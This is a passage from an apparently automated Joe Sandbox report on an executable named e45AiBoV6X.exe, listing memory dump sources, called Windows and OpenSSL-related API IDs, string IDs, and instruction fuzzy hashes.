                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode
                                                              • String ID:
                                                              • API String ID: 953036326-0
                                                              • Opcode ID: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
                                                              • Instruction ID: a7dbcbc1e1f74e19b309d2fcd1c6570bcd3f85d178627569dfc7b3fa630c83f6
                                                              • Instruction Fuzzy Hash: ED91AF72F1865385F760DB69A4502BD2BA0BB48B8CF144139DE2EE6EE5EE38D441D700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: Operation not permitted$unknown
                                                              • API String ID: 1452528299-31098287
                                                              • Opcode ID: 3eb7fdf123b224d789d6a34ffa9101ea107b745f6317a6d8691ddf250b284916
                                                              • Instruction ID: d74a3a7d97b2a96285dba25a36f01989142933d439fe4b2a47a498b2572399d4
                                                              • Instruction Fuzzy Hash: F4815C22F5AA439AEB10AB11E874B7927A1FB81788F480235DD6D836FDDF7CE4459700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _get_daylight$_isindst
                                                              • String ID:
                                                              • API String ID: 4170891091-0
                                                              • Opcode ID: 8f9731ccc05e5e98dab1658fcebd939f282d40e9b6d5561daf5942648b351509
                                                              • Instruction ID: d4ceb545be7043e67d001a431b80e9bf04aaf939a909428c11a316e0b72fea94
                                                              • Instruction Fuzzy Hash: 1751E573F041138AEB14DF64AD956BD27A2AB5839DF540135DD2ED2AF6EF38A501C700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                              • String ID:
                                                              • API String ID: 2780335769-0
                                                              • Opcode ID: 44011dbc5c196255e5d063134f532b0674048b95aab6dcf0e225215e54208c6d
                                                              • Instruction ID: 4ec867d2007e2f41d018b0819f3d7f61bae324759b9f82f4574747d48d87c50b
                                                              • Instruction Fuzzy Hash: 35516822E086428AFB24DF7194503BD23A1AF4CB9CF149535DE29C76A9EF38D5A1C740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: LongWindow$DialogInvalidateRect
                                                              • String ID:
                                                              • API String ID: 1956198572-0
                                                              • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                              • Instruction ID: 59bb9a2abd7cb7dc067461ba02fc92d881dd4d05ad8528567b615fd358c1a378
                                                              • Instruction Fuzzy Hash: 1A11C631E0814342FB64EB6AE55827D1291EF8CBC4F949031DA6987FEAED2CF4C18640
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                              • String ID:
                                                              • API String ID: 2933794660-0
                                                              • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                              • Instruction ID: 0d44c07b34abdebbf698619f9d83ddde915a951e6aea69ede6e902a6afa5f816
                                                              • Instruction Fuzzy Hash: 9B114826B14B068AEB00DB60E9542BC33A4FB5D758F041E31DA2DC6BA4EF78E1998340
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                              • String ID: ?
                                                              • API String ID: 1286766494-1684325040
                                                              • Opcode ID: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
                                                              • Instruction ID: 11d8f06991529424cd6897463360c2c90a14e325b5a542a2007728b21feedea8
                                                              • Instruction Fuzzy Hash: 88412A12A0828345FB249B25D5253795660EF987E4F109235EE7CC6AF5FF3CD541C700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007
                                                              • String ID: %02d%02d%02d%02d%02d%02dZ$%04d%02d%02d%02d%02d%02dZ
                                                              • API String ID: 3568877910-2648760357
                                                              • Opcode ID: 35c0674a6fc9a5195c317095fe527ac94bcdae6bb520b7aade9e85fd0519ba43
                                                              • Instruction ID: 5efa28e1edcf241e4b1ba7a9ecf14fa6d13e38bbe22d3a1de5c1e074c4807dec
                                                              • Instruction Fuzzy Hash: 50516132B1D7828AE760CB15E45066AB7A4FB89780F544135EA9D87BEDEF3CE4419B00
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: getaddrinfo
                                                              • String ID: ..\s\crypto\bio\b_addr.c
                                                              • API String ID: 300660673-2547254400
                                                              • Opcode ID: cee4118a91f4e298bb24630199019e17d2161ccb3740edd78188986782efcc03
                                                              • Instruction ID: f1b95439acf8b30d26a2d2961f732bfff81405c81f708239639b6b5538a7bf41
                                                              • Instruction Fuzzy Hash: 8341F872B1968387E721DF12A890ABE77A0FB85780F004135FA9943BE9DF3CD4459B40
                                                              APIs
                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB1F835E
                                                                • Part of subcall function 00007FF6FB1F9C58: HeapFree.KERNEL32(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C6E
                                                                • Part of subcall function 00007FF6FB1F9C58: GetLastError.KERNEL32(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C78
                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6FB1EBEC5), ref: 00007FF6FB1F837C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                              • String ID: C:\Users\user\Desktop\e45AiBoV6X.exe
                                                              • API String ID: 3580290477-3551109972
                                                              • Opcode ID: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
                                                              • Instruction ID: 10b7e5f03b503dde526c9d0b3b79f6bc87970166dcc8d70c70fc678bf12099f0
                                                              • Instruction Fuzzy Hash: C0416C36E08A53C5EB18DF25E9811BC27A4EB497D8B555035EA6EC7BE5EE3CE481C300
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                              • String ID: .$:
                                                              • API String ID: 2020911589-4202072812
                                                              • Opcode ID: d87eb04c00ab0d11921b960990d015d2b833b70a5179bc2debb53fca30d01a9c
                                                              • Instruction ID: 751dcc1dd1b5525232542b870e70bda81a8fe4585af1ea3eb1b8886e7e3f7060
                                                              • Opcode Fuzzy Hash: d87eb04c00ab0d11921b960990d015d2b833b70a5179bc2debb53fca30d01a9c
                                                              • Instruction Fuzzy Hash: EA414A22E0965398FB10DBA198611BC27B4BF1875CF540039EE6DA7AE9EF78A456C300
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite
                                                              • String ID: U
                                                              • API String ID: 442123175-4171548499
                                                              • Opcode ID: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
                                                              • Instruction ID: 8578bb5448fca6d6b7ca3f789977a7d2209c012eeacf791fba62aa5c6ae5ebc4
                                                              • Opcode Fuzzy Hash: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
                                                              • Instruction Fuzzy Hash: 8541B322A18A8681DB20DF25E4447BA6760FB8C798F944131EE5DC7BE8EF3CD441CB40
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007E1170E126
                                                              • String ID: ..\s\crypto\x509v3\v3_utl.c$E
                                                              • API String ID: 200926875-2813183830
                                                              • Opcode ID: 0eef34bb189bc0c96894fbceed15470d689ed06ecddb61039ee8e60ce9ea0c21
                                                              • Instruction ID: 74d0a505fb9a0cf0bf144491f1e0d8fb5488b47eaac703f54e6f8e364668a473
                                                              • Opcode Fuzzy Hash: 0eef34bb189bc0c96894fbceed15470d689ed06ecddb61039ee8e60ce9ea0c21
                                                              • Instruction Fuzzy Hash: CF414D61B1B74385EB14EB12A820A796790AF4A7D0F484435EE6D47BEEDF3CE612D700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007E2002
                                                              • String ID: ..\s\crypto\rand\randfile.c$Filename=
                                                              • API String ID: 1750240854-2201148535
                                                              • Opcode ID: ffb6a3000f1f43db175e07ee08783f9f81d8d84b3e7221bb60cce5b0c7cc5f2d
                                                              • Instruction ID: 38d8ab1d0b4f0c38291c65db4003a972ab7bcb8f0b9caa53874e3d85428ea5a0
                                                              • Opcode Fuzzy Hash: ffb6a3000f1f43db175e07ee08783f9f81d8d84b3e7221bb60cce5b0c7cc5f2d
                                                              • Instruction Fuzzy Hash: 6D318162B0E64796EB10EB15E460AFA6391FF85788F844035EA6D47AEDDF3CF5048B01
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1991624093.00007FFDFB381000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFB380000, based on PE: true
                                                              • Associated: 00000001.00000002.1991585735.00007FFDFB380000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB3F3000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB3F5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB418000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB423000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB42D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1992057570.00007FFDFB430000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1992103361.00007FFDFB432000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb380000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ..\s\ssl\ssl_sess.c$T
                                                              • API String ID: 0-2647723609
                                                              • Opcode ID: a86c482ed1667c2386997e7d485d9949709b2799da1d8a0bf24f4547081771c5
                                                              • Instruction ID: 7fda89159b5d1ba42f90db4267b9f657dc36f20ef18aabfb856e3f9a5fabab36
                                                              • Opcode Fuzzy Hash: a86c482ed1667c2386997e7d485d9949709b2799da1d8a0bf24f4547081771c5
                                                              • Instruction Fuzzy Hash: A5215025B5964382EB50EF61D424BE967D0EB84748F884036DA5D473EAEF3DE508CB01
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID: :
                                                              • API String ID: 1611563598-336475711
                                                              • Opcode ID: e37c33f8f2befd5fbd3c49cdc0b6d52123385b6fd944ea7372e41dd3f6ca63dc
                                                              • Instruction ID: 1f03d44e165032d7eeec944408b60b3d3521c9fa64b7f28c6c1d81e73b34da24
                                                              • Opcode Fuzzy Hash: e37c33f8f2befd5fbd3c49cdc0b6d52123385b6fd944ea7372e41dd3f6ca63dc
                                                              • Instruction Fuzzy Hash: E921B123A0868381EB60DB15D04427E73A1FBCCB88F854035D6AD836E8EF7CE545C751
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastgetsockname
                                                              • String ID: ..\s\crypto\bio\b_sock.c
                                                              • API String ID: 566540725-540685895
                                                              • Opcode ID: 3f7e4d637075843b50ffdfd6546d49ef448eefcf8eb4d6d42073b27a69ad320d
                                                              • Instruction ID: 4f6f56d2f082c290709c539ff2fc5f1ba576be647c492d9b86ae00a43c6409ad
                                                              • Opcode Fuzzy Hash: 3f7e4d637075843b50ffdfd6546d49ef448eefcf8eb4d6d42073b27a69ad320d
                                                              • Instruction Fuzzy Hash: 1B2160B1B0650786E710DB21E825AEE6760FF82754F840535EAAC436F8DF3DE685DB40
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                              • Instruction ID: 0d81c36123044be23eced6fa8f0323cd471005690991adf5f33c967407c1c9f3
                                                              • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                              • Instruction Fuzzy Hash: A0114C36A18B4582EB218B15E54026D77E1FB88B98F184231DE9D47BA4EF3DE551C700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
